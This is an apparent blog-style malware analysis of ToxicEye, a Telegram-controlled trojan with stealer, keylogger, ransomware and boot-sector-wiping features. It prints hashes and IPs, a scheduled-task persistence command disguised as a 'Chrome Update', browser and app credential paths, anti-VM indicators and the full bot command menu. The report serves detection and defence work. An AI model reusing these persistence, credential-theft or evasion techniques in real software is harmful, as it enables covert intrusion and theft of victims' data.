ToxicEye Malware is an advanced type of malware currently active all around the world. In this analysis we delve deep inside it’s core to better understand it’s modus operandi and how to defeat it.
ToxicEye Malware: Basic Features
ToxicEye Malware: Using Telegram bot as a C&C server
Telegram is the encrypted messaging service and malware that uses Telegram as a command and control channel typically uses the Telegram Bot API for communications.
ToxicEye Malware: Remote control
ToxicEye use spyware functions and grab victims webcam, desktop screenshots, audio records and compress as zip archive those stolen files for sending back to attacker.
ToxicEye Malware: Keylogger
Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording the keys struck on a keyboard, typically covertly, so that a person using the keyboard is unaware that their actions are being monitored. Data can then be retrieved by the person operating the logging program.
ToxicEye Malware: Password and Document stealer
After victim clicks to the Malware our attacker can collect various saved data from users machine such as Documents,Credit Cards,Steam,Discord,Telegram, FileZilla and Browser data (Cookies,History,Bookmarks,Passwords) , malware author also scan most used web browser and target them too (Opera, Brave, Yandex etc …) by their default paths on Windows machine.
ToxicEye Malware: Ransomware (*crypt)
Ransomware is a form of malware that encrypts a victim’s files. The attacker then demands a ransom from the victim to restore access to the data upon payment. ToxicEye found and encrypts most important files for victim as shown in source code, also there is different types of crypto money address for receive money from victim.
Easy to use for Script Kiddie
Open source malware samples often use guide, user manuals or compiling guide for the attackers and this tools can really harm victims they are not really sophisticated and easy to use but at the end this tools are open in public and even 13 years old can change the source code and use various packer or obfustication techniques for spreading.
Browser History stealer
Attacker also get browser history data the main reason for doing this sometimes victim put their passwords on unsecure web sites and those web sites store users password on plaint text in URL or secret user tokens (often peoples use one password in each accounts) also this can be really powerful intelligence gathering for the victim and attacker can demonstrate some Phishing attack for victim or victims friends.
ToxicEye Malware: Static Properties Analysis
File Identifier : Generic CIL Executable (.NET, Mono, etc.)
Hash :
MD5 01D96B9F56AF9F1707710AFA9BCF0DE4
SHA1 FCDA030D6DA2CC5CF54693940439789713C5B635
IP Traffic:
173.194.214.139 (ICMP) – “google.com”
149.154.167.220 (ICMP) – “telegram.org”
149.154.167.220:443 (TCP) – “telegram.org”
ToxicEye Malware: Behavior Analysis
Found potential URL in binary/memory (https://ghostbin.co/paste/6bn6p):
Those URL’s contain as plaintext as shown in blow and malware use those link to perform attacks , gathering information from victim machine and for C&C server using Telegram API.
Interesting Strings (https://ghostbin.co/paste/z29gm):
Persistence via Windows Task Scheduler and hide as a Chrome Update.
| “C:\Windows\System32\schtasks.exe” /create /f /sc ONLOGON /RL HIGHEST /tn “Chrome Update” /tr “C:\Users\ToxicEye\rat.exe” |
Dropper
| C:\Users\ToxicEye\rat.exe |
Delete specific temp file
| “C:\Windows\System32\cmd.exe” /C C:\Users\admin\AppData\Local\Temp\tmp3E0C.tmp.bat & Del C:\Users\admin\AppData\Local\Temp\tmp3E0C.tmp.bat |
Kill TelegramRat.exe in process tree and start rat.exe
| Tasklist /fi “PID eq 3568” |
Various interesting strings for attack vectors
| \\CommandCam.exe \\discord\\Local Storage\\leveldb\\ \\FileZilla\\ \\fmedia\\ \\keylogs \\keylogs.txt \\Local State \\root\\SecurityCenter2 \\tdata\\ \\Telegram Desktop\\tdata\\ \\User Data\\Default\\Bookmarks \\User Data\\Default\\Cookies \\User Data\\Default\\History \\User Data\\Default\\Login Data \\User Data\\Default\\Web data \CommandCam.exe \keylogs.txt [!] Failed load libraries, not connected to internet! [!] Retrying connect to api.telegram.org [!] Retrying connect to internet… [!] Shutdown signal received.. [!] Stopping command listener thread [+] Clipper is starting… [+] Connected to api.telegram.org [+] Copying to system… [+] Installing to autorun… [+] Process checker started [+] Restarting command listener thread [+] Set |
Touches files in the Windows directory (https://ghostbin.co/paste/zdfob):
This files are Windows OS files and malware can reach them for getting more information about system
Reads information about supported languages:
Windows have default Registry for store data about OS and other software’s Malwares often use those and manipulate specific strings, collect data about victim machine, make persistence itself and much more.
| “TelegramRAT.exe” (Path: “HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE”; Key: “00000409”) |
Possibly tries to implement anti-virtualization techniques:
ToxicEye have some interesting feature for make hard to analyses, attacker can manage this in config file, malware don’t start on VirtualBox environments and we use these environments for avoid infect my machine and make analyses more secure way.
| “inSandboxie” (Indicator: “sandboxie”) “PreventStartOnVirtualMachine” (Indicator: “virtualmachine”) “inVirtualBox” (Indicator: “virtualbox”) “Sandboxie:” (Indicator: “sandboxie”) “VirtualBox:” (Indicator: “virtualbox”) “VirtualBox” (Indicator: “virtualbox”) “\nSandboxie:” (Indicator: “sandboxie”) “\nVirtualBox:” (Indicator: “virtualbox”) “vmware” (Indicator: “vmware”) “VMware” (Indicator: “vmware”) “VBox” (Indicator: “vbox”) |
Try to find .dll used on SandBox’s and search Strings used from VirtualBox (VIRTUAL,Vbox,vmware,etc…) for avoid Malware Analysis and not start in those systems (attacker can change this option as an settings in config file ).
Try to checks for the presence of an Antivirus engine:
Attacker can see which Anti Virus product used on victim machine.
| “DetectAntivirus” (Indicator: “antivirus”) “Comodo” (Indicator: “comodo”) |
Try to elevate privileges:
Sometimes attacker needs some privileges for access and control the machine if victim machine not have admin rights on device try to make him admin but this option didn’t work on my test Windows 10 machine . 
Command and Control Commands (Full features of ToxicEye):
Those commands are sent by the attacker from Telegram app BOT and attacker can receive data from victim machine using Telegram API.
| Telegram.sendText( “\n 🌎 INFORMATION:” + “\n /ComputerInfo” + “\n /BatteryInfo” + “\n /Location” + “\n /Whois” + “\n /ActiveWindow” + “\n” + “\n🎧 SPYING:” + “\n /Webcam <camera> <delay>” + “\n /Microphone <seconds>” + “\n /Desktop” + “\n /Keylogger” + “\n” + “\n📋 CLIPBOARD:” + “\n /ClipboardSet <text>” + “\n /ClipboardGet” + “\n” + “\n📊 TASKMANAGER:” + “\n /ProcessList” + “\n /ProcessKill <process>” + “\n /ProcessStart <process>” + “\n /TaskManagerDisable” + “\n /TaskManagerEnable” + “\n” + “\n /MinimizeAllWindows” + “\n /MaximizeAllWindows” + “\n” + “\n💳 STEALER:” + “\n /GetPasswords” + “\n /GetCreditCards” + “\n /GetHistory” + “\n /GetBookmarks” + “\n /GetCookies” + “\n /GetDesktop” + “\n /GetFileZilla” + “\n /GetDiscord” + “\n /GetTelegram” + “\n /GetSteam” + “\n” + “\n💿 CD-ROM:” + “\n /OpenCD” + “\n /CloseCD” + “\n” + “\n💼 FILES:” + “\n /DownloadFile <file/dir>” + “\n /UploadFile <drop/url>” + “\n /RunFile <file>” + “\n /RunFileAdmin <file>” + “\n /ListFiles <dir>” + “\n /RemoveFile <file>” + “\n /RemoveDir <dir>” + “\n /MoveFile <filr> <file>” + “\n /CopyFile <file> <file>” + “\n /MoveDir <dir> <dir>” + “\n /CopyDir <dir> <dir>” + “\n” + “\n🚀 COMMUNICATION:” + “\n /Speak <text>” + “\n /Shell <command>” + “\n /MessageBox <error/info/warn> <text>” + “\n /OpenURL <url>” + “\n /SetWallpaper <file>” + “\n /SendKeyPress <keys>” + “\n /NetDiscover <to>” + “\n /Uninstall” + “\n” + “\n🔊 AUDIO: ” + “\n /PlayMusic <file>” + “\n /AudioVolumeSet <0-100>” + “\n /AudioVolumeGet” + “\n” + “\n💣 EVIL:” + “\n /BlockInput <seconds>” + “\n /Monitor <on/off/standby>” + “\n /DisplayRotate <0,90,180,270>” + “\n /EncryptFileSystem <password>” + “\n /DecryptFileSystem <password>” + “\n /ForkBomb” + “\n /BSoD” + “\n /OverwriteBootSector” + “\n” + “\n💡 POWER:” + “\n /Shutdown” + “\n /Reboot” + “\n /Hibernate” + “\n /Logoff” + “\n” + “\n💰 OTHER:” + “\n /Help” + “\n /About” + |
Overwrite MBR :
Overwrites the Master Boot Record of a machine and leaving it unbootable , attacker can cause damage on victims machine used for trolling the victims.
Try to Anti Reverse Engineering:
As an option attacker can choose don’t start the Malware in a virtual machine environment also scan process tree and if there is a packet analyzer such as Wireshark do same maneuver and make harder to analysis.
Steal specific application data:
For identify if user have this Software’s, Malware using default path of this Software’s or process names and if Malware find it try to steal victim credentials and sensitive data.
Telegram:
Steam:
Spyware:
Malware use third party software’s for Webcam screenshot and Record microphone and save these files inside %TEMP% folder for revive back to attacker with Telegram API , CommandCam.exe and audio.zip downloaded from URLs and executed in system for performing this attacks.
MITRE ATT&CK Techniques Detection:
MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. ToxicEye have those capability’s but specially the Privilege Escalation one not working in Windows 10 machine.
Weaknesses about this Malware:
1-) Developed with C#.
2-) We can catch important Strings such as (TelegramToken and TelegramChatID) and stop C&C server.
3-) Malware author don’t use any Packer or Obfuscation technique for hide Strings and attack vectors.
4-) Highly flagged as Malware from various Anti-Virus software’s especially same attack vectors used from other Malwares with same source code.
5-) Not tested from different Windows version and not stable for connection with victim.
